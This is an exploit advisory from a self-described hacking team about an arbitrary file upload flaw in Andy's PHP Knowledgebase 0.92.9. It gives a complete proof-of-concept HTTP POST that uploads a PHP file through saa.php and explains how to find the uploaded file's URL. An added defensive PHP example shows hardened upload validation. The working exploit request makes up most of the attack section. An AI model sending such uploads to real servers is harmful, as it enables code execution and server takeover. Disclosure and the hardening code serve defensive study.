Andy's PHP Knowledgebase 0.92.9 Arbitrary File Upload Vulnerability
Source: cwh.citec.us  Author: CWH  Published: 2008-12-02
==============================================================
Andy's PHP Knowledgebase Arbitrary File Upload Vulnerability
==============================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /          
  / XXXXXX /
(________(            
  `------'


AUTHOR : CWH Underground
DATE   : 1 December 2008
SITE   : cwh.citec.us


#####################################################
APPLICATION : Andy's PHP Knowledgebase
VERSION     : 0.92.9
DOWNLOAD    : http://sourceforge.net/project/showfiles.php?group_id=113755
#####################################################

--- Arbitrary File Upload ---

On the saa.php page, a user can submit an article with an attachment, which then waits for admin approval.
The attachment is written to the server as soon as the form is submitted, with no check of the file type.
An arbitrary file can therefore be uploaded through this form, and the URL of the uploaded file is shown on the authors.php page.

--------
  POC
--------

POST /cms/aphpkb/saa.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://127.0.0.1/cms/aphpkb/saa.php?aid=2
Cookie: module=table; PHPSESSID=b311c4f9b1f3ee0c071f33ffd3b3176f
Content-Type: multipart/form-data; boundary=---------------------------22955284022147
Content-Length: 1080
-----------------------------22955284022147
Content-Disposition: form-data; name="title"

PoC Arbitrary File Upload
-----------------------------22955284022147
Content-Disposition: form-data; name="article"

PoC Arbitrary File Upload
-----------------------------22955284022147
Content-Disposition: form-data; name="keywords"

PoC Arbitrary File Upload
-----------------------------22955284022147
Content-Disposition: form-data; name="aid"

2
-----------------------------22955284022147
Content-Disposition: form-data; name="upload"; filename="info.php"
Content-Type: application/octet-stream

<? phpinfo(); ?>
-----------------------------22955284022147
Content-Disposition: form-data; name="description"

PHP File
-----------------------------22955284022147
Content-Disposition: form-data; name="aid"

2
-----------------------------22955284022147
Content-Disposition: form-data; name="a"


-----------------------------22955284022147
Content-Disposition: form-data; name="submit"

Submit/Save
-----------------------------22955284022147--


HTTP/1.x 200 OK
Date: Mon, 01 Dec 2008 05:39:35 GMT
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4578
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html


-----------------------------------------------------------------------

The link to the uploaded file is listed at http://[Target]/[aphpkb_path]/authors.php
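
A server-side check of the kind the saa.php upload lacks, as an added example (not code from Andy's PHP Knowledgebase or from the advisory). store_attachment(), UPLOAD_DIR, MAX_BYTES, ALLOWED_TYPES and the storage path are hypothetical names and values; PHP 7+ with the fileinfo extension is assumed.

```php
<?php
// Added example: hardened handling for an attachment field such as "upload".
// All names below are hypothetical and not taken from the application.

const UPLOAD_DIR = '/var/lib/aphpkb/attachments';  // assumed path OUTSIDE the web root
const MAX_BYTES  = 2 * 1024 * 1024;                // assumed size limit (2 MiB)
const ALLOWED_TYPES = [                            // extension => expected MIME type
    'pdf' => 'application/pdf',
    'png' => 'image/png',
    'jpg' => 'image/jpeg',
    'txt' => 'text/plain',
];

/**
 * Validate one entry of $_FILES and move it into UPLOAD_DIR.
 * Returns the server-generated stored name; throws on rejection.
 */
function store_attachment(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (($file['size'] ?? 0) > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // The client-supplied name is used only to select an allow-list entry;
    // it is never used as the name on disk.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_TYPES)) {
        throw new RuntimeException('file type not allowed'); // info.php stops here
    }
    // Inspect the content itself, not the Content-Type sent by the client.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED_TYPES[$ext]) {
        throw new RuntimeException('content does not match extension');
    }
    // Random server-side name: no client-controlled path or extension.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], UPLOAD_DIR . '/' . $stored)) {
        throw new RuntimeException('could not store file');
    }
    return $stored;
}
```

Because the files land outside the web root under a generated name, they would be served back through a download script rather than by a direct URL, so nothing uploaded is ever handed to the PHP interpreter.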


#######################################################################################
Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#######################################################################################

 